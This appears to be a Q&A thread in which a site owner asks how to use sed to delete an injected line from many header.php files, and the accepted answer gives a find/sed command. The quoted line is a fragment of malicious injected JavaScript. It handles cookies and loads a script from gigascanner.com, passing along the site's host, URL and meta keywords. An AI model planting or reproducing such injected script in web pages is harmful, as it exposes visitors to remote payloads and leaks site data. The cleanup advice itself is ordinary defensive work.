# Delete one line in many header.php files

Tags: linux, shell, sed

I want to delete one line in some files.

The specific line:

> var a='';setTimeout(1);function setCookie(a,b,c){var d=new
>   Date;d.setTime(d.getTime()+60*c*60*1e3);var
>   e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function
>   getCookie(a){for(var
>   b=a+"=",c=document.cookie.split(";"),d=0;dhttp://www.gigascanner.com/js/jquery.min.php' + '?key=b64' +
>   '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host +
>   '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' +
>   encodeURIComponent(((k=(function(){var keywords = '';var metas =
>   document.getElementsByTagName('meta');if (metas) {for (var
>   x=0,y=metas.length; x<' + '/script>')));

I try it with sed.

```
sed -i '/<script>var a='';setTimeout(1);function setCookie(a,b,c)/d' ./header.php
```

I read this SO question but it doesn't work for me.

I think I do something wrong?

[Delete lines in a text file that containing a specific string](https://stackoverflow.com/questions/5410757/delete-lines-in-a-text-file-that-containing-a-specific-string)

Comment: The line to delete spans multiple lines?

Comment: This probably is possible. But I learned that for such tasks some graphical tool comes in handy.... Take a look at `kfilereplace`. Very convenient. And has a dry-run mode ;-)

Comment: probably need to use double quotes as outer quotes as line to delete itself has single quotes.. or use `\x27` inplace of `'`

Comment: @arkascha thanks. But I need a commant for the shell.

Comment: this files not multiple lines,only one line and <script> word is not includes your test files. use sed  "/var a='';setTimeout(1);function setCookie(a,b,c)/d"  ./header.php. this deletes this line.

Answer (score 0, accepted):

Thanks for the comments.

I've found a solution.

```
find ./ -type f -exec sed -i '/setTimeout(1);function setCookie(a,b,c)/d' {} \;
```